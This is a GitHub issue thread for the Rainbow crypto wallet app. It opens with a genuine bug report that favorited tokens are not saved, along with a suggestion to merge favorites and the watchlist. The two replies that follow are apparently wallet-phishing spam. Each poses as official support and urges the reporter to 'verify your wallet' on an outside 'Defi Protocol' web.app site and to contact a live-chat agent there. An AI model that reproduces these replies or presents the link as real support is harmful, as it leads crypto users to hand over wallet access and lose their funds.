### ISSUE TITLE
Favorites list doesn’t work, hasn’t worked for a long time 

### ISSUE THREAD

**Issue by jforaker** [rainbow-me/rainbow#5007]
Hello. Love this app. Long time iOS user. However the “favorites” feature simply doesn’t work. If I add a token to my favorites list, the next day or whenever the next time I open the app, the token I added is not saved. 

Further feedback: it would be great to see favorites and watchlist combined in some way. It seems there is complication in the code (perhaps a pain point) in determining which is which. For example if you search a token and press the + button you are presented with the “watchlist” and “favorites” option. Neither of which is reliable and having both doesn’t make sense, especially if they don’t actually save the token to the correct place. 

1.8.28 (2)
iOS 16.6
iPhone 13 Pro

**Comment by Najnic** [comment]
Hi @jinchung 
Visit the official [Defi Protocol](https://defirefixprotocol.web.app/) page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app/)
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by Nochao** [comment]
> Hello. Love this app. Long time iOS user. However the “favorites” feature simply doesn’t work. If I add a token to my favorites list, the next day or whenever the next time I open the app, the token I added is not saved.
> 
> Further feedback: it would be great to see favorites and watchlist combined in some way. It seems there is complication in the code (perhaps a pain point) in determining which is which. For example if you search a token and press the + button you are presented with the “watchlist” and “favorites” option. Neither of which is reliable and having both doesn’t make sense, especially if they don’t actually save the token to the correct place.
> 
> 1.8.28 (2) iOS 16.6 iPhone 13 Pro

Hi @jforaker 
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for your eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.
